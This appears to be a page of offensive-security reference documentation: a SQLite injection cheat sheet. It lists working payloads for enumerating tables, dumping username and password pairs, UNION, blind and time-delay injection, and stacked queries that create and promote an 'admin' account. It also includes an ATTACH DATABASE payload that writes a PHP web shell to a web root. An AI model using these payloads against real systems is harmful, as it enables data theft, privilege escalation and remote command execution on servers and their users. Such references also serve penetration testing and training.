Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Identification

SELECT sqlite_version()
-- Comment: -- or /* */
-- String concat: 'a'||'b'
-- No user system, no privileges

Information Gathering

SELECT sqlite_version()
SELECT typeof(1)                         -- Confirm SQLite

Enumerate Tables

SELECT name FROM sqlite_master WHERE type='table'
SELECT group_concat(name) FROM sqlite_master WHERE type='table'
SELECT sql FROM sqlite_master WHERE type='table'     -- Shows CREATE TABLE

Enumerate Columns

SELECT sql FROM sqlite_master WHERE type='table' AND name='users'
PRAGMA table_info(users)
sql column shows full CREATE TABLE statement with all column names and types.

Dump Data

SELECT group_concat(username||':'||password, char(10)) FROM users
SELECT username||':'||password FROM users

String Functions

FunctionDescription
||Concatenate
SUBSTR(str,pos,len)Substring
LENGTH(str)String length
UNICODE(char)Unicode code point
CHAR(n)Char from code point
UPPER(str)Uppercase
LOWER(str)Lowercase
REPLACE(str,old,new)Replace
TRIM(str)Trim whitespace
HEX(str)Hex encode
ZEROBLOB(n)N zero bytes
GROUP_CONCAT(col)Aggregate concat
GROUP_CONCAT(col,sep)Concat with separator

Conditional

CASE WHEN condition THEN true_val ELSE false_val END
IIF(condition, true_val, false_val)        -- 3.32+

Time Delay

SQLite has no sleep function. Alternatives: 
-- Heavy computation
AND 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000))))

-- Adjust RANDOMBLOB size for delay length

Error-Based

SQLite error messages are less verbose. Limited error-based: 
AND 1=CAST((SELECT group_concat(name) FROM sqlite_master) AS int)

UNION

' UNION SELECT 1,2,3-- -
' UNION SELECT 1,group_concat(name),3 FROM sqlite_master WHERE type='table'-- -
' UNION SELECT 1,group_concat(username||':'||password),3 FROM users-- -

File Write — ATTACH DATABASE

'; ATTACH DATABASE '/var/www/html/shell.php' AS pwn; CREATE TABLE pwn.cmd (data text); INSERT INTO pwn.cmd VALUES ('<?php system($_GET["cmd"]); ?>');-- -
Writes PHP web shell as SQLite database file (contains payload in binary).

Boolean Blind

' AND SUBSTR((SELECT name FROM sqlite_master LIMIT 1),1,1)='u'-- -
' AND UNICODE(SUBSTR((SELECT name FROM sqlite_master LIMIT 1),1,1))>100-- -

Stacked Queries

Supported depending on driver: 
'; INSERT INTO users VALUES ('hacker','pass');-- -
'; UPDATE users SET role='admin' WHERE username='hacker';-- -

No information_schema

SQLite uses sqlite_master instead:
QueryPurpose
SELECT name FROM sqlite_master WHERE type='table'List tables
SELECT sql FROM sqlite_master WHERE name='tbl'Show CREATE statement
PRAGMA table_info(tbl)Column info
PRAGMA database_listAttached databases

Type System

SQLite uses dynamic typing — any column accepts any type. No strict type enforcement. This means:
  • CAST errors are less common
  • Type-based detection may not work
  • No need to match column types in UNION

Sources